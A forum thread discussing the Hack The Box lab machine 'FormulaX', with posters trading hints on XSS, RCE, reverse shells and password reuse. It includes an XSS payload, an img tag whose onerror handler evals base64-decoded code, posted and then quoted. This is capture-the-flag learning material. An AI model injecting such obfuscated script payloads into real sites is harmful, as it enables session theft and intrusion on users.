HTB - FormulaX
by paven - Saturday March 9, 2024 at 12:54 PM
#11
Hello

Here is a payload to exploit the XSS.

I'll let you analyze it and adapt it for yourself ;)

<img SRC=x onerror='eval(atob("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"));' />
#12
Where do I exploit the XSS?
#13
(Mar 10, 2024, 12:35 AM)jahman Wrote: Hello

Here is a payload to exploit the XSS.

I'll let you analyze it and adapt it for yourself ;)

<img SRC=x onerror='eval(atob("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"));' />

Bro, I've been on this for hours, how did you figure this out??
#14
Stuck on reverse shell :|
Able to determine the XSS on first name & last name, but couldn't find a way to obtain a shell.
#15
Where to put the RCE, guys?
#16
Finally got user. Anybody stuck on user can PM me.
#17
(Mar 10, 2024, 07:05 AM)DoesntMatter123456 Wrote: Finally got user. Anybody stuck on user can PM me.

I have inserted a listener into chat and enabled the HTTP service locally, but I am sending the payload on the Contact Us page without translation. Is that right?
#18
(Mar 10, 2024, 07:05 AM)DoesntMatter123456 Wrote: Finally got user. Anybody stuck on user can PM me.

Check PM please.
#19
(Mar 10, 2024, 08:35 AM)iNone Wrote: Some hint for frank -> kai?

Look at what you'll find on port 3000. Work with it. Try to become admin. There is an unintended and an intended way there as well.

Once inside that webapp, find out how to do RCE and grab a shell.

Enumerate more, pass reusing, env variables? And that's how you will find kai.
#20
Where do I put the RCE?